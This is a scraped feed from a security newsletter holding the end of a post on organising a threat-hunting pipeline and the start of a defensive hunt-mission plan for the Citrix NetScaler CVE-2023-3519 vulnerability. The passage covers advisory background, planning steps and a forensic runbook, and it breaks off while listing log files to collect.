y2="14"></line></svg></button></div></div></div></a></figure></div><p>If we overlay the potential sources of intel that make up a rich pipeline we would then have to modify the funnel to this:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!aUiE!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4ef71ad4-8c56-4919-af31-7e6ecabb961d_982x1051.svg" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!aUiE!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4ef71ad4-8c56-4919-af31-7e6ecabb961d_982x1051.svg 424w, https://substackcdn.com/image/fetch/$s_!aUiE!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4ef71ad4-8c56-4919-af31-7e6ecabb961d_982x1051.svg 848w, https://substackcdn.com/image/fetch/$s_!aUiE!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4ef71ad4-8c56-4919-af31-7e6ecabb961d_982x1051.svg 1272w, https://substackcdn.com/image/fetch/$s_!aUiE!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4ef71ad4-8c56-4919-af31-7e6ecabb961d_982x1051.svg 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!aUiE!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4ef71ad4-8c56-4919-af31-7e6ecabb961d_982x1051.svg" width="982" height="1051" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/4ef71ad4-8c56-4919-af31-7e6ecabb961d_982x1051.svg&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1051,&quot;width&quot;:982,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:&quot;The Threat Hunting Pipeline&quot;,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="The Threat Hunting Pipeline" title="The Threat Hunting Pipeline" srcset="https://substackcdn.com/image/fetch/$s_!aUiE!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4ef71ad4-8c56-4919-af31-7e6ecabb961d_982x1051.svg 424w, https://substackcdn.com/image/fetch/$s_!aUiE!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4ef71ad4-8c56-4919-af31-7e6ecabb961d_982x1051.svg 848w, https://substackcdn.com/image/fetch/$s_!aUiE!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4ef71ad4-8c56-4919-af31-7e6ecabb961d_982x1051.svg 1272w, https://substackcdn.com/image/fetch/$s_!aUiE!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4ef71ad4-8c56-4919-af31-7e6ecabb961d_982x1051.svg 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>We can provide details on what each phase of the pipeline entails, by breaking the phases down into specific tasks:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!tZGi!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0af84feb-e2d3-44f4-9533-64178843620c_1544x1051.svg" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!tZGi!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0af84feb-e2d3-44f4-9533-64178843620c_1544x1051.svg 424w, https://substackcdn.com/image/fetch/$s_!tZGi!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0af84feb-e2d3-44f4-9533-64178843620c_1544x1051.svg 848w, https://substackcdn.com/image/fetch/$s_!tZGi!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0af84feb-e2d3-44f4-9533-64178843620c_1544x1051.svg 1272w, https://substackcdn.com/image/fetch/$s_!tZGi!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0af84feb-e2d3-44f4-9533-64178843620c_1544x1051.svg 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!tZGi!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0af84feb-e2d3-44f4-9533-64178843620c_1544x1051.svg" width="1544" height="1051" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/0af84feb-e2d3-44f4-9533-64178843620c_1544x1051.svg&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1051,&quot;width&quot;:1544,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:&quot;The Threat Hunting Pipeline&quot;,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="The Threat Hunting Pipeline" title="The Threat Hunting Pipeline" srcset="https://substackcdn.com/image/fetch/$s_!tZGi!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0af84feb-e2d3-44f4-9533-64178843620c_1544x1051.svg 424w, https://substackcdn.com/image/fetch/$s_!tZGi!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0af84feb-e2d3-44f4-9533-64178843620c_1544x1051.svg 848w, https://substackcdn.com/image/fetch/$s_!tZGi!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0af84feb-e2d3-44f4-9533-64178843620c_1544x1051.svg 1272w, https://substackcdn.com/image/fetch/$s_!tZGi!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0af84feb-e2d3-44f4-9533-64178843620c_1544x1051.svg 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Probably that reads too small for you &#128069;, so let's break down each phase into its core tasks.</p><h1>Threat Hunt Pipeline High Level Process</h1><blockquote><p>First of all, bear in mind:&nbsp;<strong>each phase in the pipeline deserves its own process</strong>.&nbsp;<em>We are only describing the high level aspects here</em>. It is up to you to define the detailed process that fits your business model, industry vertical, delivery strategy, etc.</p></blockquote><blockquote><p><em>Why would I want to tell you what to do here? (I wouldn't, at least not for free &#128521;)</em></p></blockquote><h2>Collect</h2><h3>Ensure that threat information is collected into one or several platforms</h3><p>Threat information will be produced by different teams, at various levels of your organization. It is a nice thought to think all of it will be centralized in a single pane of glass, but this is usually not the case.</p><p>From the&nbsp;<strong>active defence threat hunting function</strong>&nbsp;perspective, you need to ensure that you have identified the platforms where the various functions and teams in your organization store data that has any type of threat-informed information coded within.</p><p>As long as you have access to the source data, you can then further refine it down the hunt pipeline,&nbsp;<strong>transforming fragmented and unrelated data into coherent clusters of actionable information</strong>, following&nbsp;<a href="https://aimod2.com/docs/03-data-semantics/daiki-the-semantic-chain/?ref=quasarops.com">DAIKI principles</a>&nbsp;(Data, Information, Knowledge, Insight)</p><h3>Ensure communication channels exist between source teams and the hunt function</h3><p>Your active defence threat hunting function won't get too far if it's not continuously absorbing organizational context and synthesizing it into actionable information.</p><p>The active defence threat hunting function needs to embed itself in the various communication channels that exist between source teams producing threat-informed data.</p><p>You need to have a&nbsp;<em>hunt emissary</em>&nbsp;of sorts in relevant forums and make the right agreements with key stakeholders to ensure contextually relevant information flows into the hunt pipeline.</p><h3>Ensure teams producing that information make it available to the hunt function</h3><p>Similar to the above, ensure that threat-informed data is readily made available in some shape or form, the further along the DAIKI semantic chain, the better. That is, the more refined, structured, and relevant is the information, the easier it's going to be to digest it in the hunt pipeline and quickly operationalize it into actionable hunt missions.</p><h2>Analyse</h2><h3>Validate and triage information</h3><p>As information flows into the hunt pipeline, you need to ensure that you have a process for validating the relevancy and quality of this information.</p><p>Not all information is made the same. Information from a full-blown threat report like&nbsp;<a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-201a?ref=quasarops.com">CISA Advisory for the Exploitation of Citrix CVE-2023-3519</a>&nbsp;provides plenty of insights that are easy to digest and convert into hunt mission objectives and runbooks.</p><p>Information coming from pentest engagements where many exploitable vulnerabilities have been found in a few applications does not provide the same level of actionability. You need to perform an analysis of this type of information, identify patterns, understand the impact, and enrich this with MITRE ATT&amp;CK TTPs and linked threat actors that leverage similar exploit vectors.</p><p>In any case, you need to triage incoming threat-informed data and prioritize what will make it further down the hunt pipeline. What deserves to be further understood and analysed, and what can we drop?</p><h3>Perform use-case feasibility assessment</h3><p>Once you have prioritized your information, you need to evaluate what is involved in converting the potential energy of that information into kinetic energy. At the risk of losing half my audience here because I am not using "businessy" jargon, let me rephrase the above as&nbsp;<em>effectively harnessing the latent value of collected data in terms of its actionability</em>.</p><p>Your feasibility assessment process needs to truly assess what data is material for hunt missions. This involves defining exclusion criteria and prioritization criteria based on attributes like:</p><ul><li><p>what is the freshness of the threat information</p></li><li><p>how does it link to your Crown Jewels (because you have obviously identified them I assume? &#129325;)</p></li><li><p>what is the exploitability score of any vulnerabilities identified in the use-case, for example, by implementing&nbsp;<a href="https://www.first.org/epss/?ref=quasarops.com">EPSS</a>&nbsp;(exploit prediction scoring system)</p></li><li><p>does the threat-informed data relate to past or present incidents?</p></li><li><p>are there prior hunt missions that could be enriched with this information, in order to run new iterations of them?</p></li><li><p>does the potential use-case align with strategical priorities defined by your business unit or cyber operations function?</p></li><li><p>does the information relate to external threat actors that regularly target your industry vertical?</p></li></ul><p>There are many more considerations to make, but you get the point.</p><h3>Identify requirements</h3><p>In Cyber Threat Intelligence, you normally have to identify collection requirements at the beginning of your threat intel lifecycle. This is fine when you are the producer of information for downstream teams that consume it.</p><p>In a threat hunting pipeline, your requirement identification phase is kind of an extension of the feasibility assessment. It involves understanding what are the potential use-cases for the information that has made it thus far down the pipeline.</p><p>Requirement identification is also concerned with understanding what the rest of the pipeline looks like, whether it makes sense to add a new hunt idea to the backlog, and whether this is feasible with available resources.</p><p>This subsection is added for clarity, but it is really part of Feasibility Assessment.</p><h3>Gather business context</h3><p>Once you have identified a good use-case, which will be converted into a hunt mission further downstream, you have to gather further contextual awareness:</p><ul><li><p>is there documentation that relates to your potential hunt mission</p></li><li><p>what are the key stakeholders that are linked to the threat, vulnerability, or technology stack</p></li><li><p>is there a need to involve other teams or business functions to understand the topic better and give your hunters the best chance of success?</p></li></ul><p>Business context gathering can also be collapsed into the Feasibility Assessment process.</p><h2>Plan</h2><h3>Designate Hunt Mission Lead</h3><p>Once the information has been captured, refined, and understood, it is time to designate a threat hunt mission lead, who will take over the rest of the pipeline, and ensure the use-case is converted into a hunt mission.</p><p>The hunt mission lead is accountable for the mission delivery end-to-end.</p><h3>Determine Hunting Squad Composition</h3><p>The hunt mission lead needs to recruit hunters from the pool, in order to prepare the hunt mission for execution.</p><h3>Select Hunt Mission Type(s)</h3><p>There are many&nbsp;<a href="https://aimod2.com/docs/03-data-semantics/daiki-applied-to-threat-hunting/?ref=quasarops.com">hunt mission types</a>, threat hunters would have made best efforts to enrich and refine information in the best way possible, but there is always some more work that the hunt squad will have to perform.</p><p>The mission type you choose is based on the state of the information along the DAIKI chain and what is the end goal of the mission. Do we want to simply begin to understand the data spectrum, what shape it has, the fields, and details of logs? then perhaps an&nbsp;<strong>exploratory data analysis mission</strong>&nbsp;is the best. Do we have threat information that is very relevant to our business and technology stack, but lacks the detailed factor of threat reports? then perhaps a&nbsp;<strong>hypothesis-based operation</strong>&nbsp;is the best mission type.</p><h3>Layout Hunt Mission</h3><p>The threat hunt mission lead needs to lay out the structure of the hunt mission, including timeframes, scope, and runbook.</p><h2>Execute</h2><h3>Run Hunt Mission</h3><p>At this point, the Hunt Pipeline Process hands over to the specific process that governs a particular mission type.</p><p>The hunt mission is run according to the stipulated process. The hunt mission process should include an outcomes phase where results are communicated to stakeholders, playbooks and reports are written, and the workload is updated.</p><h2>Outcomes</h2><h3>Collect feedback on mission outcomes</h3><p>It is important that the different stakeholders provide feedback around the relevancy, accuracy, and value-add of selected hunt missions.</p><p>The Active Defence Threat Hunting Lead needs to meet regularly with mission leads to understand enablers, blockers, gaps and issues.</p><h3>Update Metrics</h3><p>Whatever metrics you use to measure the flow and quality of your hunt program need to be continuously updated to ensure they reflect real stats.</p><p>Ideally, this process should be automated and DevOpsified, because why not?</p><h3>Identify Continuous Improvement Opportunities</h3><p><a href="https://cio-wiki.org/wiki/ITIL_Continual_Service_Improvement_(CSI)?ref=quasarops.com">Continuous Service Improvement</a>&nbsp;is one of the key aspects of ITIL. It is important to collect feedback from mission leads, threat hunters, and stakeholders to understand where are the opportunities for improvement.</p><p>We are not playing a finite game here but an&nbsp;<a href="https://simonsinek.com/books/the-infinite-game/?ref=quasarops.com">infinite game</a>. Continuous improvement is just part of the game.</p><h1>Did you enjoy this?</h1><p>And that's about it today folks, I have probably spoken long enough for a Sunday afternoon &#128521;</p><p><em>I have no desire to share these ideas with an audience that has no interest whatsoever in what we are building here</em>.</p><p>And what we are building my friends is <em>a pathway to active cyber defence and beyond, into adaptive cyber defence.</em> That's why I share this with my subscribers!</p><p><strong>I want us all to be part of a higher collective intelligence and collaborate to develop creative paths and a healthy connective tissue of like-minded humans.</strong></p><p>Hopefully, we can help businesses protect themselves and improve the quality of life of people around the world, whilst hoping to discover and practice better ways to take care of our planet.</p><p>&#128161;</p><p>So if some of the ideas laid out in this article resonate with you, please share them with your like-minded inner circle and <a href="https://www.quasarops.com/subscribe?">ask them to subscribe to the Tales of a Cyberscout</a>.</p><p>Enjoy your day and I hope you all have a great week ahead!</p><p><em>Cheers,<br>Diego The Cyberscout</em></p>]]></content:encoded></item><item><title><![CDATA[Citrix Netscaler CVE-2023-3519 Hunt Mission Plan]]></title><description><![CDATA[The Prelude]]></description><link>https://www.quasarops.com/p/citrix-cve-2023-3519-mission-plan</link><guid isPermaLink="false">https://www.quasarops.com/p/citrix-cve-2023-3519-mission-plan</guid><dc:creator><![CDATA[Diego Perez]]></dc:creator><pubDate>Mon, 04 Sep 2023 07:29:54 GMT</pubDate><enclosure url="https://substack-post-media.s3.amazonaws.com/public/images/e99da9ac-e723-4a7f-93f1-f379d40e0ae8_512x450.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h2>The Prelude</h2><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!jrm-!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9edc4b1e-b474-4e57-a142-16d6812bf0aa_512x450.jpeg" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!jrm-!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9edc4b1e-b474-4e57-a142-16d6812bf0aa_512x450.jpeg 424w, https://substackcdn.com/image/fetch/$s_!jrm-!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9edc4b1e-b474-4e57-a142-16d6812bf0aa_512x450.jpeg 848w, https://substackcdn.com/image/fetch/$s_!jrm-!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9edc4b1e-b474-4e57-a142-16d6812bf0aa_512x450.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!jrm-!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9edc4b1e-b474-4e57-a142-16d6812bf0aa_512x450.jpeg 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!jrm-!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9edc4b1e-b474-4e57-a142-16d6812bf0aa_512x450.jpeg" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/9edc4b1e-b474-4e57-a142-16d6812bf0aa_512x450.jpeg&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:&quot;Citrix Netscaler CVE-2023-3519 Hunt Mission Plan&quot;,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="Citrix Netscaler CVE-2023-3519 Hunt Mission Plan" title="Citrix Netscaler CVE-2023-3519 Hunt Mission Plan" srcset="https://substackcdn.com/image/fetch/$s_!jrm-!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9edc4b1e-b474-4e57-a142-16d6812bf0aa_512x450.jpeg 424w, https://substackcdn.com/image/fetch/$s_!jrm-!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9edc4b1e-b474-4e57-a142-16d6812bf0aa_512x450.jpeg 848w, https://substackcdn.com/image/fetch/$s_!jrm-!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9edc4b1e-b474-4e57-a142-16d6812bf0aa_512x450.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!jrm-!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9edc4b1e-b474-4e57-a142-16d6812bf0aa_512x450.jpeg 1456w" sizes="100vw" fetchpriority="high"></picture><div></div></div></a><p>Hello everyone, it would seem that time has gone quite fast and my temporal abilities to navigate the river of Chronos are not yet good enough. Ideally, I would like to train the power of <em>slowing time</em>, enjoying the shades of it as you go through your day.</p><p>I have the feeling that Chronos is not the best way to do it though, but rather, it is Kairos that holds the secret for a different experience of time. I will speak of the three perceptions of time in another epistle. <em>I know this is not the reason why you are reading this new Tales of a Cyberscout ;)</em> So how about we dive into our topic for today?</p><p>Going to our main topic of today, I know there are many Organisations out there struggling with either a response or compromise assessment of the Citrix NetScaler recent vulnerabilities, especially CVE-2023-3519. At the same time, a lot of people have asked me to show an example of applied&nbsp;<a href="https://aimod2.com/?ref=quasarops.com">AIMOD2</a>&nbsp;so I decided to do this leveraging another Sh*trix vuln. <em>Let's explore how we can operationalize the framework and apply it practically</em>.</p><h1>Background</h1><p>I would like to share here an approach to crafting a threat hunt mission to investigate a Citrix NetScaler scenario. Effectively, we will be breaking down the hunt mission into four phases (these can be compressed down to three or two phases depending on your preferences):</p><ol><li><p><strong>Initial Research</strong>: collating information from available OSINT sources.</p></li><li><p><strong>Planning</strong>: setting up the structure of your mission.</p></li><li><p><strong>Discovery &amp; Disruption</strong>: performing your analysis and escalating or containing potential damage.</p></li><li><p><strong>Outcomes</strong>: producing your final report, playbooks and any other relevant artefacts.</p></li></ol><blockquote><p><strong>Note</strong>:&nbsp;<em>I've had a few requests at crafting a hunt mission for MoveIT or Ivanti Endpoint Manager. I will try to come up with an example for those soon ;)</em></p></blockquote><blockquote><p><strong>Note2</strong>: It is important to understand this threat hunting approach is designed to work in a rapid-response or live forensics scenario. You should decide whether this approach is valid in your environment, or whether a more "forensics-focused" method is better, by cloning your Netscaler disks and acquiring volatile memory, then performing a dead-forensics analysis.</p></blockquote><h2>Initial Research</h2><p>CVE-2023-3519 is a vulnerability impacting NetScaler (formerly Citrix) Application Delivery Controller (ADC) and the NetScaler Gateway that allows for unauthenticated remote code execution (RCE). To address this vulnerability, Citrix issued a public advisory along with a patch on 18 July 2023. However, available threat intelligence points to this vulnerability being under active exploitation since at least 7th July 2023, with some sources indicating this happened as early as June 2023, when threat actors were observed leveraging the zero-day exploit to deploy WebShells within NetScaler ADC appliances. This entails that even organizations that have patched on time would have been exposed to the RCE through a window of about 11 to 40 days of pre-patched active exploitation.</p><p>Once deployed, WebShells provide cybercriminals with a conduit for conducting reconnaissance within the target's active directory (AD), since Citrix NetScalers utilize service accounts that can query a tenant AD to be able to provide some of its core functionality. This facilitates the extraction and exfiltration of AD-associated data once an appliance is compromised.</p><p>In its advisory, Citrix stated that CVE-2023-3519 can be exploited remotely without authentication, but only against appliances that are configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) OR AAA&#8239;virtual&#8239;server.</p><p>A more <a href="https://blog.fox-it.com/2023/08/15/approximately-2000-citrix-netscalers-backdoored-in-mass-exploitation-campaign/https://blog.fox-it.com/2023/08/15/approximately-2000-citrix-netscalers-backdoored-in-mass-exploitation-campaign/?ref=quasarops.com">recent report by Fox-IT</a> <em>"uncovered a large-scale exploitation campaign of Citrix NetScalers in a joint effort with the Dutch Institute of Vulnerability Disclosure (DIVD)"</em>. The report states that automation was used by a cyber threat actor to exploit <a href="https://nvd.nist.gov/vuln/detail/CVE-2023-3519?ref=quasarops.com">CVE-2023-3519</a> in a systematic way, placing WebShells on vulnerable NetScalers to gain persistent access.</p><p>According to Fox-IT, <em>"the adversary can execute arbitrary commands with this webshell, even when a NetScaler is patched and/or rebooted"</em>. <strong>At the time the report was released, more than 1900 NetScalers remained backdoored.</strong></p><p>Using the data supplied by Fox-IT, the Dutch Institute of Vulnerability Disclosure notified victims. However, it is plausible that the data gathered for the report is not fully representative of all vulnerable and/or backdoored NetScaler systems out there. This report, and the lack of notification from the Dutch Institute of Vulnerability Disclosure, s<em>hould not be used as evidence of lack of exploitation or compromise</em>.</p><p>References:</p><ul><li><p><a href="https://support.citrix.com/article/CTX561482/citrix-adc-and-citrix-gateway-security-bulletin-for-cve20233519-cve20233466-cve20233467?ref=quasarops.com">https://support.citrix.com/article/CTX561482/citrix-adc-and-citrix-gateway-security-bulletin-for-cve20233519-cve20233466-cve20233467</a></p></li><li><p><a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-201a?ref=quasarops.com">https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-201a</a></p></li><li><p><a href="https://www.mandiant.com/resources/blog/citrix-zero-day-espionage?ref=quasarops.com">https://www.mandiant.com/resources/blog/citrix-zero-day-espionage</a></p></li><li><p><a href="https://www.picussecurity.com/resource/blog/cve-2023-3519-threat-actors-exploits-the-citrix-zero-day-vulnerability-for-remote-code-execution?ref=quasarops.com">https://www.picussecurity.com/resource/blog/cve-2023-3519-threat-actors-exploits-the-citrix-zero-day-vulnerability-for-remote-code-execution</a></p></li><li><p><a href="https://www.securityweek.com/exploitation-of-new-citrix-zero-day-likely-to-increase-organizations-warned/?ref=quasarops.com">https://www.securityweek.com/exploitation-of-new-citrix-zero-day-likely-to-increase-organizations-warned/</a></p></li><li><p><a href="https://blog.fox-it.com/2023/08/15/approximately-2000-citrix-netscalers-backdoored-in-mass-exploitation-campaign/?ref=quasarops.com">https://blog.fox-it.com/2023/08/15/approximately-2000-citrix-netscalers-backdoored-in-mass-exploitation-campaign/</a></p></li></ul><h2>Planning</h2><p>Here you would ensure that you are setting up the required building blocks to ensure the hunt mission is executed according to your company's or client's process:</p><ul><li><p>Create a record to track actions in your case management suite</p></li><li><p>Ensure the mission has a designated mission lead, accountable for the end-to-end delivery</p></li><li><p>Ensure the hunt squad is sufficiently staffed to address the challenges and analysis of artefacts that will come your way</p></li><li><p>Notify relevant stakeholders of the situation</p></li><li><p>Obtain information about relevant SMEs, technical teams, business owners, and points of contact that will be useful during your engagement</p></li></ul><h2>Discovery &amp; Disruption</h2><p>Craft your playbook or runbook to help your hunt team drive the threat assessment.</p><blockquote><p><strong>Note</strong>:&nbsp;<em>it's important to understand these actions are just initial guidelines, kick off ideas, they are not meant to address the full spectrum of possible DFIR analysis tasks, your hunters need to remain flexible and creative, to come up with additional angles and ideas that may have not been captured by the mission lead initially.</em></p></blockquote><h2>Threat Hunt Runbook</h2><p>id Activity 1 Acquire system artefacts 2 Analyse HTTP Logs 3 Investigate Suspicious Commands in Bash and Sh History 4 Investigate Scheduler Services 5 Search for WebShell File Presence 6 Search for Fileless Malware 7 Investigate Core Dumps 8 Analyse Network Data 9 Search NetScaler Configuration for Anomalies 10 Run Mandiant IOC Scanner for CVE-2023-3519</p><h3>01 | Acquire System artefacts</h3><p>There are many system artefacts that can be collected for analysis, at a minimum you need:</p><ul><li><p>all contents of&nbsp;<code>/var/log</code>&nbsp;(this will include bash.log, sh.log, auth.log, cron.log, httpaccess.log, httperror.log, httpaccess-vpn.log, messages.log, nitro.log, 